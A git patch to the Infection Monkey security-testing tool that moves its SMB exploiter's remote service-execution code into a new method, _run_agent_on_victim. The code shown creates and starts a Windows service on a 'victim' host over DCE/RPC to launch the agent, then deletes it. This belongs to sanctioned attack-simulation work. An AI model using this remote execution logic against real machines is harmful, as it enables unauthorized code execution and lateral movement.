From db09fe0cae30f18835fa2414c4dff4b26e680765 Mon Sep 17 00:00:00 2001
From: Kekoa Kaaikala <kekoa.kaaikala@gmail.com>
Date: Thu, 6 Oct 2022 14:49:36 +0000
Subject: [PATCH] Agent: Extract method _run_agent_on_victim

---
 monkey/infection_monkey/exploit/smbexec.py | 64 +++++++++++-----------
 1 file changed, 33 insertions(+), 31 deletions(-)

diff --git a/monkey/infection_monkey/exploit/smbexec.py b/monkey/infection_monkey/exploit/smbexec.py
index a9b19a08a..9a572135c 100644
--- a/monkey/infection_monkey/exploit/smbexec.py
+++ b/monkey/infection_monkey/exploit/smbexec.py
@@ -69,37 +69,7 @@ class SMBExploiter(HostExploiter):
 
             return self.exploit_result
 
-        scmr_rpc.bind(scmr.MSRPC_UUID_SCMR)
-        resp = scmr.hROpenSCManagerW(scmr_rpc)
-        sc_handle = resp["lpScHandle"]
-
-        # start the monkey using the SCM
-        try:
-            resp = scmr.hRCreateServiceW(
-                scmr_rpc,
-                sc_handle,
-                SMBExploiter.SMB_SERVICE_NAME,
-                SMBExploiter.SMB_SERVICE_NAME,
-                lpBinaryPathName=cmdline,
-            )
-        except DCERPCSessionError as err:
-            if err.error_code == 0x431:
-                logger.debug(f'SMB service "{SMBExploiter.SMB_SERVICE_NAME}" already exists')
-                resp = scmr.hROpenServiceW(scmr_rpc, sc_handle, SMBExploiter.SMB_SERVICE_NAME)
-            else:
-                self.exploit_result.error_message = str(err)
-                return self.exploit_result
-
-        service = resp["lpServiceHandle"]
-        try:
-            scmr.hRStartServiceW(scmr_rpc, service)
-            status = ScanStatus.USED
-        except Exception:
-            status = ScanStatus.SCANNED
-            pass
-        self.telemetry_messenger.send_telemetry(T1035Telem(status, UsageEnum.SMB))
-        scmr.hRDeleteService(scmr_rpc, service)
-        scmr.hRCloseServiceHandle(scmr_rpc, service)
+        self._run_agent_on_victim(scmr_rpc, cmdline)
 
         logger.info(
             "Executed monkey '%s' on remote victim %r (cmdline=%r)",
@@ -219,3 +189,35 @@ class SMBExploiter(HostExploiter):
             return scmr_rpc
 
         return None
+
+    def _run_agent_on_victim(self, scmr_rpc: DCERPC_v5, cmdline: str):
+        scmr_rpc.bind(scmr.MSRPC_UUID_SCMR)
+        resp = scmr.hROpenSCManagerW(scmr_rpc)
+        sc_handle = resp["lpScHandle"]
+
+        try:
+            resp = scmr.hRCreateServiceW(
+                scmr_rpc,
+                sc_handle,
+                SMBExploiter.SMB_SERVICE_NAME,
+                SMBExploiter.SMB_SERVICE_NAME,
+                lpBinaryPathName=cmdline,
+            )
+        except DCERPCSessionError as err:
+            if err.error_code == 0x431:
+                logger.debug(f'SMB service "{SMBExploiter.SMB_SERVICE_NAME}" already exists')
+                resp = scmr.hROpenServiceW(scmr_rpc, sc_handle, SMBExploiter.SMB_SERVICE_NAME)
+            else:
+                self.exploit_result.error_message = str(err)
+                return self.exploit_result
+
+        service = resp["lpServiceHandle"]
+        try:
+            scmr.hRStartServiceW(scmr_rpc, service)
+            status = ScanStatus.USED
+        except Exception:
+            status = ScanStatus.SCANNED
+            pass
+        self.telemetry_messenger.send_telemetry(T1035Telem(status, UsageEnum.SMB))
+        scmr.hRDeleteService(scmr_rpc, service)
+        scmr.hRCloseServiceHandle(scmr_rpc, service)